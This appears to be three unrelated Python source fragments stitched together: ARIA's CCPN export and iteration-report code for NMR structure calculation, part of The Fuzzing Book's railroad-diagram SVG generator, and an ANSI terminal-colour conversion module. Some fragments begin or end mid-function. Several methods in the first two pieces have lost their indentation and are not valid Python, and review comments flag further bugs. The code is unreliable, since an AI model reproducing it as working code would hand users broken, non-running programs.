        # empty this raises NameError at the export_structures test; confirm
        # chains can never be empty here, or hoist the two assignments.
        if chains:
            ccpnMolSystem = chains[0].molSystem
            ccpnAriaRun = ccpnExport.getAriaRun(ccpnMolSystem)
            ask_water = self.getSettings()['water_refinement']['enabled'] == YES
            is_last_iteration = iteration.getNumber() == project.getSettings()['n_iterations']-1
            if ccpnAriaRun:
                # TJS: Completed runs will not be used again after this
                if (is_water_refinement and ask_water) or \
                   (is_last_iteration and not ask_water):
                    ccpnAriaRun.status = 'completed'
        else:
            ccpnAriaRun = None
        # TJS: Export structures before restraints & peaks thus
        # we have to link NmrConstraintStore to the structure generation
        # at the very end
        struct_gen = None
        if s['export_structures'] == YES and \
           (is_last_iteration or is_water_refinement):
            export = 1
            # TJS: Moved above beacause chains needed for CCPn Run Object
            # chains = ccpnExport.getChainsFromAria2(restraints, ccpn_project,
            #                                        aria_chain=aria_chain)
            if not chains:
                self.warning('CCPN export: No molecular system found.')
                return
            structures = ccpnExport.getStructuresFromAria2Dir(path, chains)
            if not structures:
                self.warning('CCPN export: Unable to load any structures from iteration directory %s' % path)
            else:
                self.message('CCPN export: PDB files exported.')
                if not is_water_refinement:
                    name = 'ARIA2_run_%s_it%d' % (run_name, iteration.getNumber())
                    details = 'Structures created by ARIA2, %s run "%s", iteration %d.' % \
                              (file_root, run_name, iteration.getNumber())
                else:
                    name = 'ARIA2_run_%s_water_refine' % (run_name,)
                    details = 'Structures created by ARIA2, %s run "%s", water refinement.' % \
                              (file_root, run_name)
                # TJS: Structure generation is the old way of storing results
                struct_gen = ccpnExport.makeStructureGeneration(structures, None)
                struct_gen.name = name
                struct_gen.details = details
                # TJS: Store ARIA generated data as output of CCPN NmrCalc run
                if ccpnAriaRun:
                    dataObj = ccpnAriaRun.newStructureEnsembleData(ensembleId=structures.ensembleId,
                                                                   molSystemCode=chains[0].molSystem.code,
                                                                   ioRole='output', name=name,
                                                                   details=details)
        else:
            structures = None
        if not is_water_refinement and (s['export_noe_restraint_list'] == 'all' or \
                                        (s['export_noe_restraint_list'] == 'last' and \
                                         is_last_iteration)):
            export = 1
            # Reuse one NmrConstraintStore across iterations of this run.
            if self.constraintSetSerial is not None:
                constraintSet = nmrProject.findFirstNmrConstraintStore(serial=self.constraintSetSerial)
                self.message('CCPN export: Using existing constraint set.')
            else:
                self.message('CCPN export: Creating new constraint set.')
                constraintSet = ccpnExport.makeNmrConstraintStore(nmrProject)
                self.constraintSetSerial = constraintSet.serial
            # TJS: Link back to any structure generation object
            if struct_gen:
                struct_gen.nmrConstraintStore = constraintSet
            # BARDIAUX: Update for multiple chains
            chains = ccpnExport.getChainsFromAria2(restraints, ccpn_project,
                                                   aria_chain=aria_chain)
            if restraints:
                # TJS expert rejected (not active) restraints back to CCPN for analysis
                constrList, rejectList, violList = ccpnExport.getConstraintsFromAria2(restraints, chains, constraintSet,
                                                                                      structures)
                constrList.name = 'ARIA2_run%s_NOEs_it%d' % (run_name, iteration.getNumber())
                constrList.details = 'ARIA2 NOEs, project "%s", run "%s", iteration %d.' % \
                                     (file_root, run_name, iteration.getNumber())
                # TJS: Store ARIA generated data as output of CCPN NmrCalc run
                if ccpnAriaRun:
                    cSet = constraintSet.serial
                    dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
                                                                 constraintListSerials=[constrList.serial],
                                                                 ioRole='output', name=constrList.name,
                                                                 details=constrList.details)
                # TJS constraint list contaning the inactive restraints
                if rejectList is not None:
                    rejectList.name = 'ARIA2_REJECT_run%s_NOEs_it%d' % (run_name, iteration.getNumber())
                    rejectList.details = 'ARIA2 *INACTIVE* NOEs, project "%s", run "%s", iteration %d.' % \
                                         (file_root, run_name, iteration.getNumber())
                    # TJS: Store ARIA generated data as output of CCPN NmrCalc run
                    if ccpnAriaRun:
                        cSet = constraintSet.serial
                        dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
                                                                     constraintListSerials=[rejectList.serial],
                                                                     ioRole='output', name=rejectList.name,
                                                                     details=rejectList.details)
                self.message('CCPN export: NOE restraint list exported.')
            # BARDIAUX export Constraints from CCPN
            for orig_list, distance_constraints in iteration.getDistanceRestraints().items():
                # TJS adjust; we want the inactive too. ;-)
                # distance_constraints = [r for r in distance_constraints if r.isActive()]
                constrList, rejectList, violList = ccpnExport.getConstraintsFromAria2(distance_constraints, chains,
                                                                                      constraintSet, structures)
                # TJS adjust
                ccpnKeys = getKeysFromString(orig_list.getDataSource().get('ccpn_id'))
                list_id = '%s|%s' % (ccpnKeys[-2],ccpnKeys[-1])# Project id is too verbose and redundant inside same project
                constrList.name = 'ARIA2_run%s_Dists_%s_it%d' % (run_name, list_id, iteration.getNumber())
                constrList.details = 'ARIA2 Distances %s, project "%s", run "%s", iteration %d.' % \
                                     (orig_list.getName(), file_root, run_name, iteration.getNumber())
                # TJS: Store ARIA generated data as output of CCPN NmrCalc run
                if ccpnAriaRun:
                    cSet = constraintSet.serial
                    dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
                                                                 constraintListSerials=[constrList.serial],
                                                                 ioRole='output', name=constrList.name,
                                                                 details=constrList.details)
                # TJS constraint list contaning the inactive restraints
                if rejectList is not None:
                    rejectList.name = 'ARIA2_REJECT_run%s_Dists_%s_it%d' % (run_name, list_id, iteration.getNumber())
                    rejectList.details = 'ARIA2 *INACTIVE* Distances %s, project "%s", run "%s", iteration %d.' % \
                                         (orig_list.getName(), file_root, run_name, iteration.getNumber())
                    # TJS: Store ARIA generated data as output of CCPN NmrCalc run
                    if ccpnAriaRun:
                        cSet = constraintSet.serial
                        dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
                                                                     constraintListSerials=[rejectList.serial],
                                                                     ioRole='output', name=rejectList.name,
                                                                     details=rejectList.details)
                self.message('CCPN export: DistanceConstraints list exported.')
        if not is_water_refinement and (s['export_assignments'] == YES and is_last_iteration):
            import aria.DataContainer as DC
            export = 1
            ## compile dict that maps peaklist keys to name of new peaklist
            ccpn_spectra = [x for x in project.ccpn_data_sources.get(DC.DATA_SPECTRUM, ())]
            names_dict = {}
            template = 'ARIA2_NOE_Peaks_run%s_it%d_%s'
            for x in ccpn_spectra:
                ccpn_id = x['peaks']['ccpn_id']
                args = run_name, iteration.getNumber(), ccpn_id
                names_dict[ccpn_id] = template % args
            peak_list_keys = ccpnExport.getPeakAssignmentsFromAria2(ccpn_project, restraints, namesDict=names_dict,
                                                                    aria_chain=aria_chain)
            # TJS: Store ARIA generated data as output from run
            if ccpnAriaRun and peak_list_keys:
                from aria.importFromCcpn import getCcpnPeakList
                for peak_list_key in peak_list_keys:
                    ccpnPeakList = getCcpnPeakList(ccpn_project, peak_list_key)
                    if ccpnPeakList:
                        spectrum = ccpnPeakList.dataSource
                        eSerial = spectrum.experiment.serial
                        sSerial = spectrum.serial
                        pSerial = ccpnPeakList.serial
                        details = ccpnPeakList.details
                        plId = '%d|%d|%d' % (eSerial, sSerial, pSerial)
                        name = template % (run_name, iteration.getNumber(), plId)
                        ccpnAriaRun.newPeakListData(experimentSerial=eSerial,
                                                    dataSourceSerial=sSerial,
                                                    peakListSerial=pSerial,
                                                    ioRole='output',
                                                    details=details,
                                                    name=name[:80])
            self.message('CCPN export: NOE assignments exported.')
        if export:
            try:
                ccpn_project.saveModified()
            except Exception, msg:
                self.warning('CCPN export: Could not save project. Error message was: %s' % msg) #by AWSS, msg is an object not a string
            # NOTE(review): this "saved" message is printed even when
            # saveModified() failed above — consider moving it into an else:.
            self.message('CCPN project saved.')
def _dump_iteration(self, iteration, path):
import os
import aria.Iteration as Iteration
filename = os.path.join(path, REPORT_SUMMARY)
pickler = Iteration.IterationTextPickler()
pickler.dump(iteration, filename)
## BARDIAUX 2.2
def _dump_rms(self, peaks, iteration_number):
import aria.RmsReport as RmsReport
infra = self.getInfrastructure()
text_path = infra.get_iteration_path(iteration_number)
graphics_path = infra.get_iteration_graphics_path(iteration_number)
rp = RmsReport.RmsReport(peaks, iteration_number, text_path, graphics_path)
rp.go()
    def dumpIteration(self, iteration):
        """Write all per-iteration reports: updated spectra, the flat peak
        list, the iteration summary, the CCPN export and (from iteration 1
        on) the RMS report.  Sets the reports-written flag on completion.
        """
        import os
        from aria.Singleton import ProjectSingleton
        project = ProjectSingleton()
        check_type(iteration, 'Iteration')
        infra = self.getInfrastructure()
        path = infra.get_iteration_path(iteration.getNumber())
        # BARDIAUX 2.2
        # dump also CCPN DistanceRestraints
        # all_peaks = iteration.getPeaks()
        all_peaks = {}
        all_peaks.update(iteration.getPeaks())
        all_peaks.update(iteration.getDistanceRestraints())
        # Python 2 idiom: keys() returns a list, sorted in place for a
        # deterministic spectrum order.
        order = all_peaks.keys()
        order.sort()
        peak_list = []
        for spectrum in order:
            peaks = all_peaks[spectrum]
            ## sort peak_list wrt ref_peak number
            # Python 2 cmp-style in-place sort by reference-peak number.
            peaks.sort(lambda a, b, c = cmp: \
                       c(a.getReferencePeak().getNumber(), \
                         b.getReferencePeak().getNumber()))
            peak_list += peaks
            ## BARDIAUX 25/04/05
            # Dump updated spectrum
            if is_type(spectrum, 'ConstraintList'):
                # Not for CCPN ConstraintList
                continue
            spec_name = spectrum.getName()
            spec_name = spec_name.replace(' ','_')
            filename = os.path.join(path, spec_name + \
                                    REPORT_UPDATED_SPECTRUM +'.xml')
            s = project.getReporter()['spectra']
            if s['iteration'] == 'all' or \
               (s['iteration'] == 'last' and \
                iteration.getNumber() == project.getSettings()['n_iterations']-1):
                self._dump_spectra(peaks, spectrum, filename)
        self._dump_peak_list(peak_list, path)
        self._dump_iteration(iteration, path)
        self._dump_ccpn(iteration, path)
        ## BARDIAUX 2.2
        ## RMS report
        if peak_list and iteration.getNumber() > 0:
            try:
                self._dump_rms(peak_list, iteration.getNumber())
            #except:
            #    self.message('Error during RMS analysis/graphics generation.')
            except Exception, msg:
                import aria.tools as tools
                self.warning(tools.last_traceback())
                msg = 'Error during RMS analysis/graphics generation.'
                self.warning(msg)
        self.__reports_written = 1
def reportsWritten(self):
"""
returns 1 if any report files have been written.
"""
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This material is part of "The Fuzzing Book".
# Web site: https://www.fuzzingbook.org/html/RailroadDiagrams.html
# Last change: 2019-01-04 16:03:17+01:00
#
#!/
# Copyright (c) 2018-2019 Saarland University, CISPA, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# # Railroad Diagrams
# Notebook-export artifacts: these __main__ guards reproduce the notebook
# cell output when this module is run as a script.
if __name__ == "__main__":
    print('# Railroad Diagrams')
if __name__ == "__main__":
    # We use the same fixed seed as the notebook to ensure consistency
    import random
    random.seed(2001)
import re
import io
class C:
    """Global drawing constants for the railroad diagrams; tweak these to
    restyle every generated diagram."""
    # Display constants
    DEBUG = False  # if true, writes some debug information into attributes
    VS = 8  # minimum vertical separation between things. For a 3px stroke, must be at least 4
    AR = 10  # radius of arcs
    DIAGRAM_CLASS = 'railroad-diagram'  # class to put on the root <svg>
    # is the stroke width an odd (1px, 3px, etc) pixel length?
    STROKE_ODD_PIXEL_LENGTH = True
    # how to align items when they have extra space. left/right/center
    INTERNAL_ALIGNMENT = 'center'
    # width of each monospace character. play until you find the right value
    # for your font
    CHAR_WIDTH = 8.5
    COMMENT_CHAR_WIDTH = 7  # comments are in smaller text by default
    DEFAULT_STYLE = '''\
svg.railroad-diagram {
    background-color:hsl(100,100%,100%);
}
svg.railroad-diagram path {
    stroke-width:3;
    stroke:black;
    fill:rgba(0,0,0,0);
}
svg.railroad-diagram text {
    font:bold 14px monospace;
    text-anchor:middle;
}
svg.railroad-diagram text.label{
    text-anchor:start;
}
svg.railroad-diagram text.comment{
    font:italic 12px monospace;
}
svg.railroad-diagram rect{
    stroke-width:3;
    stroke:black;
    fill:hsl(0,62%,82%);
}
'''
def e(text):
    """Escape ``&``, ``<`` and ``>`` so *text* can be embedded in SVG/XML.

    BUG FIX: the previous version replaced each character with itself (the
    entity names had been lost), so no escaping happened at all and any
    markup character in a label produced invalid SVG.  ``&`` is escaped
    first so that the other replacements are not double-escaped.
    """
    text = str(text)
    text = text.replace("&", "&amp;")
    text = text.replace("<", "&lt;")
    text = text.replace(">", "&gt;")
    return text
def determineGaps(outer, inner):
    """Split the slack space (outer - inner) into (left, right) gaps
    according to C.INTERNAL_ALIGNMENT."""
    slack = outer - inner
    alignment = C.INTERNAL_ALIGNMENT
    if alignment == 'left':
        return 0, slack
    if alignment == 'right':
        return slack, 0
    # center (default)
    return slack / 2, slack / 2
def doubleenumerate(seq):
    """Yield ``(i, i - len(seq), item)`` for each item of *seq*.

    The second index counts from the back: ``-len(seq)`` for the first
    item, ``-1`` for the last.

    BUG FIX: the original called ``len(list(seq))`` and then iterated *seq*
    again, so one-shot iterables (generators) were consumed by the length
    measurement and yielded nothing.  Materializing once fixes that while
    preserving behaviour for lists and tuples.
    """
    items = list(seq)
    length = len(items)
    for i, item in enumerate(items):
        yield i, i - length, item
def addDebug(el):
    """When C.DEBUG is on, attach a data-x attribute describing *el*'s
    type and bounding box to the element for inspection in the SVG."""
    if C.DEBUG:
        info = "{0} w:{1} h:{2}/{3}/{4}".format(
            type(el).__name__, el.width, el.up, el.height, el.down)
        el.attrs['data-x'] = info
class DiagramItem(object):
    """Base node of a railroad diagram: an SVG element with a tag name,
    attributes and child content, plus layout bookkeeping."""

    def __init__(self, name, attrs=None, text=None):
        # up = distance it projects above the entry line
        # height = distance between the entry/exit lines
        # down = distance it projects below the exit line
        self.name = name
        self.height = 0
        self.attrs = attrs or {}
        self.children = [text] if text else []
        self.needsSpace = False

    def format(self, x, y, width):
        # Subclasses must lay themselves out.
        raise NotImplementedError  # Virtual

    def addTo(self, parent):
        """Append self to *parent*'s children; returns self for chaining."""
        parent.children.append(self)
        return self

    def writeSvg(self, write):
        """Serialise this element (and its subtree) through *write*."""
        write(u'<{0}'.format(self.name))
        for attr in sorted(self.attrs):
            write(u' {0}="{1}"'.format(attr, e(self.attrs[attr])))
        write(u'>')
        if self.name in ("g", "svg"):
            write(u'\n')
        for child in self.children:
            if isinstance(child, DiagramItem):
                child.writeSvg(write)
            else:
                write(e(child))
        write(u'</{0}>'.format(self.name))

    def __eq__(self, other):
        if not isinstance(self, type(other)):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class Path(DiagramItem):
    """Builds up an SVG <path> 'd' attribute via chained relative move/
    line/arc helpers; every drawing method returns self for fluent use.
    NOTE(review): arc_8 relies on `math` being imported at module level,
    which is not visible in this chunk — confirm the import exists.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y
        DiagramItem.__init__(self, 'path', {'d': 'M%s %s' % (x, y)})

    def m(self, x, y):
        # Relative moveto.
        self.attrs['d'] += 'm{0} {1}'.format(x, y)
        return self

    def ll(self, x, y):  # was l(), which violates PEP8 -- AZ
        # Relative lineto.
        self.attrs['d'] += 'l{0} {1}'.format(x, y)
        return self

    def h(self, val):
        # Relative horizontal line.
        self.attrs['d'] += 'h{0}'.format(val)
        return self

    def right(self, val):
        # Horizontal line that never goes leftwards.
        return self.h(max(0, val))

    def left(self, val):
        # Horizontal line that never goes rightwards.
        return self.h(-max(0, val))

    def v(self, val):
        # Relative vertical line.
        self.attrs['d'] += 'v{0}'.format(val)
        return self

    def down(self, val):
        # Vertical line that never goes upwards.
        return self.v(max(0, val))

    def up(self, val):
        # Vertical line that never goes downwards.
        return self.v(-max(0, val))

    def arc_8(self, start, dir):
        # 1/8 of a circle
        # `start` is a compass point (n, ne, e, se, s, sw, w, nw) and `dir`
        # is 'cw' or 'ccw'; the table below gives the arc's end-point offset
        # for each (start, dir) combination.
        arc = C.AR
        s2 = 1 / math.sqrt(2) * arc
        s2inv = (arc - s2)
        path = "a {0} {0} 0 0 {1} ".format(arc, "1" if dir == 'cw' else "0")
        sd = start + dir
        if sd == 'ncw':
            offset = [s2, s2inv]
        elif sd == 'necw':
            offset = [s2inv, s2]
        elif sd == 'ecw':
            offset = [-s2inv, s2]
        elif sd == 'secw':
            offset = [-s2, s2inv]
        elif sd == 'scw':
            offset = [-s2, -s2inv]
        elif sd == 'swcw':
            offset = [-s2inv, -s2]
        elif sd == 'wcw':
            offset = [s2inv, -s2]
        elif sd == 'nwcw':
            offset = [s2, -s2inv]
        elif sd == 'nccw':
            offset = [-s2, s2inv]
        elif sd == 'nwccw':
            offset = [-s2inv, s2]
        elif sd == 'wccw':
            offset = [s2inv, s2]
        elif sd == 'swccw':
            offset = [s2, s2inv]
        elif sd == 'sccw':
            offset = [s2, -s2inv]
        elif sd == 'seccw':
            offset = [s2inv, -s2]
        elif sd == 'eccw':
            offset = [-s2inv, -s2]
        elif sd == 'neccw':
            offset = [-s2, -s2inv]
        path += " ".join(str(x) for x in offset)
        self.attrs['d'] += path
        return self

    def arc(self, sweep):
        # Quarter-circle arc; `sweep` is two compass letters, e.g. 'ne'
        # turns from heading north to heading east.
        x = C.AR
        y = C.AR
        if sweep[0] == 'e' or sweep[1] == 'w':
            x *= -1
        if sweep[0] == 's' or sweep[1] == 'n':
            y *= -1
        cw = 1 if sweep == 'ne' or sweep == 'es' or sweep == 'sw' or sweep == 'wn' else 0
        self.attrs['d'] += 'a{0} {0} 0 0 {1} {2} {3}'.format(C.AR, cw, x, y)
        return self

    def format(self):
        # Terminate with a tiny horizontal segment so the final joint of the
        # path renders cleanly.
        self.attrs['d'] += 'h.5'
        return self

    def __repr__(self):
        return 'Path(%r, %r)' % (self.x, self.y)
def wrapString(value):
    """Coerce *value* to a DiagramItem, wrapping bare strings in a Terminal."""
    if isinstance(value, DiagramItem):
        return value
    return Terminal(value)
class Style(DiagramItem):
    """Inline <style> element carrying the diagram's CSS stylesheet."""

    def __init__(self, css):
        # Deliberately does not call DiagramItem.__init__: a Style has no
        # attrs/children and occupies no layout space.
        self.name = 'style'
        self.css = css
        self.height = 0
        self.width = 0
        self.needsSpace = False

    def __repr__(self):
        # BUG FIX: previously referenced the bare name `css`, which is not
        # defined in this scope, so repr() raised NameError.
        return 'Style(%r)' % self.css

    def format(self, x, y, width):
        # A style element takes part in no layout.
        return self

    def writeSvg(self, write):
        # Write included stylesheet as CDATA. See
        # https:#developer.mozilla.org/en-US/docs/Web/SVG/Element/style
        cdata = u'/* <![CDATA[ */\n{css}\n/* ]]> */\n'.format(css=self.css)
        write(u'<style>{cdata}</style>'.format(cdata=cdata))
class Diagram(DiagramItem):
    """Root <svg> element: wraps the given items with Start/End markers and
    an optional Style element, and precomputes the overall bounding box."""

    def __init__(self, *items, **kwargs):
        # Accepts a type=[simple|complex] kwarg
        DiagramItem.__init__(
            self, 'svg', {'class': C.DIAGRAM_CLASS, 'xmlns': "http://www.w3.org/2000/svg"})
        self.type = kwargs.get("type", "simple")
        self.items = [wrapString(item) for item in items]
        # Ensure the sequence is bracketed by Start/End markers.
        if items and not isinstance(items[0], Start):
            self.items.insert(0, Start(self.type))
        if items and not isinstance(items[-1], End):
            self.items.append(End(self.type))
        self.css = kwargs.get("css", C.DEFAULT_STYLE)
        if self.css:
            self.items.insert(0, Style(self.css))
        # Accumulate the bounding box over all drawable (non-Style) items.
        self.up = 0
        self.down = 0
        self.height = 0
        self.width = 0
        for item in self.items:
            if isinstance(item, Style):
                continue
            self.width += item.width + (20 if item.needsSpace else 0)
            self.up = max(self.up, item.up - self.height)
            self.height += item.height
            self.down = max(self.down - item.height, item.down)
        # needsSpace padding is 20 per item but only 10 at the outer edges.
        if self.items[0].needsSpace:
            self.width -= 10
        if self.items[-1].needsSpace:
            self.width -= 10
        self.formatted = False
def __repr__(self):
if self.css:
items = ', '.join(map(repr, self.items[2:-1]))
else:
items = ', '.join(map(repr, self.items[1:-1]))
pieces = [] if not items else [items]
if self.css != C.DEFAULT_STYLE:
pieces.append('css=%r' % self.css)
if self.type != 'simple':
pieces.append('type=%r' % self.type)
return 'Diagram(%s)' % ', '.join(pieces)
    def format(self, paddingTop=20, paddingRight=None,
               paddingBottom=None, paddingLeft=None):
        """Lay every item out into an inner <g> and size the root <svg>.

        Unspecified paddings cascade: right defaults to top, bottom to top,
        left to right.  Returns self; marks the diagram as formatted.
        """
        if paddingRight is None:
            paddingRight = paddingTop
        if paddingBottom is None:
            paddingBottom = paddingTop
        if paddingLeft is None:
            paddingLeft = paddingRight
        x = paddingLeft
        y = paddingTop + self.up
        g = DiagramItem('g')
        if C.STROKE_ODD_PIXEL_LENGTH:
            # Half-pixel shift keeps odd-width strokes crisp on pixel grids.
            g.attrs['transform'] = 'translate(.5 .5)'
        for item in self.items:
            if item.needsSpace:
                Path(x, y).h(10).addTo(g)
                x += 10
            item.format(x, y, item.width).addTo(g)
            x += item.width
            y += item.height
            if item.needsSpace:
                Path(x, y).h(10).addTo(g)
                x += 10
        self.attrs['width'] = self.width + paddingLeft + paddingRight
        self.attrs['height'] = self.up + self.height + \
            self.down + paddingTop + paddingBottom
        self.attrs['viewBox'] = "0 0 {width} {height}".format(**self.attrs)
        g.addTo(self)
        self.formatted = True
        return self
    def writeSvg(self, write):
        # Lazily lay the diagram out with default padding before serialising.
        if not self.formatted:
            self.format()
        return DiagramItem.writeSvg(self, write)
def parseCSSGrammar(self, text):
token_patterns = {
'keyword': r"[\w-]+\(?",
'type': r"<[\w-]+(\(\))?>",
'char': r"[/,()]",
'literal': r"'(.)'",
'openbracket': r"\[",
'closebracket': r"\]",
'closebracketbang': r"\]!",
'bar': r"\|",
'doublebar': r"\|\|",
'doubleand': r"&&",
'multstar': r"\*",
'multplus': r"\+",
'multhash': r"#",
'multnum1': r"{\s*(\d+)\s*}",
| |
""" This module deals with support of the color in the terminal through ANSI
escape codes. It defines the high level class ColoredStr which is a string
containing color escape codes ready to be printed in color to the terminal.
"""
import re
# There are three possible types of ANSI escape codes to print text in colors:
# - the first one accepts an integer in the range [0;7] which indicates one of
# the primary colors among black, red, green, yellow, blue, magenta, cyan,
# and white, in order. This escape code can actually be mixed with another
# one that put the text in bold and which has the side effect of making the
# color brighter (the normal 8 colors are quite dark). I chose not to deal
# with this second code.
# - the second one accepts an integer in the range [0;255] indicating a color
# among a specific palette of 256 colors. In the UNIX world, most terminals
# work with the x-term palette. Such a palette follows a specific pattern
# and conversions between RGB and code-point in the palette can be computed
# without carrying a whole lookup table.
# - the third one accepts three integers in the range [0;255] defining the
# color in RGB coordinates.
# Support of these codes varies from one terminal to another. Most programs
# that print stuff in color stick to the 8 basic colors, which are widely
# supported. I prefer to let the user choose what they want to use via a
# configuration file. Using an unsupported escape code can result in no color
# at all, a wrong color, or the escape code being printed literally.
ANSI_TEMPLATES = {
    '8': '\33[3{}m',              # Basic 8 colors
    'xterm-256': '\33[38;5;{}m',  # 256 colors
    'rgb': '\33[38;2;{};{};{}m'   # 24-bit RGB true colors
}
# ANSI escape codes are switches, turning on a given behaviour for all the
# text following it. This escape code resets all previous things turned on,
# making the text normal again
ANSI_RESET = '\33[0m'
# The 8 basic colors for the most basic escape code
BASIC_COLORS = [
    'black',
    'red',
    'green',
    'yellow',
    'blue',
    'magenta',
    'cyan',
    'white'
]
# Their RGB equivalent. A bit of cheating is involved here. As I said, the 8
# basic colors (not mixed with bold font) are quite dark. That's because their
# equivalent RGB colors are made of coordinates set at value 128, not 255.
# Here I use 255 for convenience with the rest of the program.
BASIC_RGB = [
    (0, 0, 0),
    (205, 0, 0),
    (0, 205, 0),
    (205, 205, 0),
    (0, 0, 238),
    (205, 0, 205),
    (0, 205, 205),
    (229, 229, 229)
]
# Python's re doesn't support repeated capture :s
# NOTE(review): these are non-raw strings; the '\(' escapes work but would be
# cleaner as r'...' literals if ever touched.
RGB_REGEX = 'rgb\(([0-9]{1,3}),([0-9]{1,3}),([0-9]{1,3})\)'
HEXA_REGEX = '#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})'
# The following constants deal with the nature of the x-term 256 colors
# palette:
# http://www.calmar.ws/vim/256-xterm-24bit-rgb-color-chart.html
# The x-term palette is structured as follows:
# - Codes in [0;7] are the 8 primary colors (the same supported by the most
#   basic escape code)
# - Codes in [8;15] are also the primary colors, but the bright version (the
#   same supported by the most basic escape code when combined with bold)
# - Codes in [16;231] are all the various colors constructed as follows: (R,
#   G, B) coordinates are incremented by regular steps. The first step is a
#   95 increment. the 4 following steps are 40 increments. (95+4*40 = 255).
#   So, for example, 16 = (0, 0, 0), 17 = (0, 0, 95), 18 = (0, 0, 135), ...,
#   21 = (0, 0, 255), 22 = (0, 95, 0), 23 = (0, 95, 95), and so on all the
#   way up to 231 = (255, 255, 255)
# - Codes in [232;255] are gray levels (R = G = B). It starts at (8, 8, 8)
#   and increments by steps of 10, arriving at (238, 238, 238) after 23
#   steps.
# The steps
XTERM_JUMPS = [95, 40, 40, 40, 40]
# The number of code values between an increment for each of the coordinates.
# For example, 36 code values separate (0, 0, 0) from (95, 0, 0), 6 code
# values separate (0, 0, 0) from (0, 95, 0) and, of course, 1 code value
# separates (0, 0, 0) from (0, 0, 95).
# To convert an x-term code value to RGB (after having removed the
# 16-offset), you first divide by 36. The quotient gives you the number of
# steps to apply to R. You then divide the remainder by 6, which gives you the
# number of steps to apply to G. The final remainder is the number of steps to
# apply to B.
XTERM_COEFF = [36, 6, 1]
XTERM_GRAY_LEVELS_START = 8
XTERM_GRAY_LEVELS_OFFSET = 232
XTERM_COLORS_OFFSET = 16
DEFAULT = 'default'
# The goal of this module is to allow the user to choose the palette he wants
# to use, without requiring consistency between the palette and the way the
# color is specified. For example, the user might use the x-term 256 palette
# and give a color in RGB. The module automatically makes the conversion from
# RGB to the corresponding value between 0 and 255.
# This function, given a color and a palette, returns the values to be
# inserted into the escape code corresponding to the given palette.
# It applies the following strategy: if the color is given in a format
# consistent with the palette, then it directly extracts the values from the
# color and returns them. Otherwise, it converts the color to RGB and then
# converts the RGB to the format suited for the palette (or just stops at RGB
# if RGB is the format suited).
def get_color_values(color, palette):
    """Returns a tuple of values to be inserted into the escape code
    corresponding to `palette`.
    color: a string describing a color. Accepted formats are:
        - one of the strings in `BASIC_COLORS`
        - the decimal representation of a number between 0 and 255 (for 256
          colors palettes)
        - a string in the form "rgb(R,G,B)" where R, G and B are integers
          between 0 and 255
        - a string in the form "#aabbcc" where aa, bb, and cc are the
          hexadecimal representation of integers between 0 and 255
    palette: one of the keys of `ANSI_TEMPLATES`
    Returns None when the color cannot be parsed or the palette is unknown.
    """
    # First resolve `color` to either a direct palette value (fast path) or
    # an intermediate (R, G, B) triple.
    rgb = None
    if color in BASIC_COLORS:
        index = BASIC_COLORS.index(color)
        if palette == '8':
            return (index,)
        # Use the bright variants (coordinates snapped to 255) for the rest
        # of the pipeline, matching the brightness of the named colors.
        rgb = tuple(255 if c > 0 else 0 for c in BASIC_RGB[index])
    elif is_in_palette(color):
        if palette == 'xterm-256':
            return (int(color),)
        rgb = xterm_palette_to_rgb(color)
    else:
        match = re.match(RGB_REGEX, color)
        if match is not None:
            rgb = tuple(int(c) for c in match.groups())
        else:
            match = re.match(HEXA_REGEX, color)
            if match is not None:
                rgb = tuple(int(c, 16) for c in match.groups())
    if rgb is None:
        # Unparseable color specification.
        return None
    # Convert the RGB triple to whatever the palette's escape code expects.
    # (The original had an extra, redundant early return for the 'rgb'
    # palette here; it duplicated the branch below and has been removed.)
    if palette == '8':
        return (rgb_to_basic(rgb),)
    if palette == 'xterm-256':
        return (rgb_to_xterm_palette(rgb),)
    if palette == 'rgb':
        return rgb
    return None
def is_in_palette(color):
    """True when *color* is the decimal representation of an integer in
    the 256-color palette range [0; 255]."""
    try:
        return 0 <= int(color) <= 255
    except ValueError:
        return False
def rgb_to_basic(rgb):
    """Map an RGB triple onto the nearest of the 8 basic colors by
    thresholding each channel at 128."""
    wanted = tuple(int(c >= 128) for c in rgb)
    for code, base in enumerate(BASIC_RGB):
        if wanted == tuple(int(c > 0) for c in base):
            return code
def xterm_palette_to_rgb(color):
    """Convert an x-term 256-palette code (int or decimal string) to an
    (R, G, B) triple."""
    code = int(color)
    # Dark primaries (0-7).
    if code <= 7:
        return BASIC_RGB[code]
    # Bright primaries (8-15): channels snapped to 255.
    if 8 <= code <= 15:
        return tuple(255 if c > 0 else 0 for c in BASIC_RGB[code - 8])
    # Gray ramp (232-255): starts at 8, steps of 10.
    if XTERM_GRAY_LEVELS_OFFSET <= code <= 255:
        return (8 + 10 * (code - XTERM_GRAY_LEVELS_OFFSET),) * 3
    # 6x6x6 color cube (16-231): decompose into per-channel step counts and
    # sum the corresponding jump increments.
    remainder = code - XTERM_COLORS_OFFSET
    channels = []
    for coeff in XTERM_COEFF:
        steps, remainder = divmod(remainder, coeff)
        channels.append(sum(XTERM_JUMPS[:steps]))
    return tuple(channels)
def rgb_to_xterm_palette(rgb):
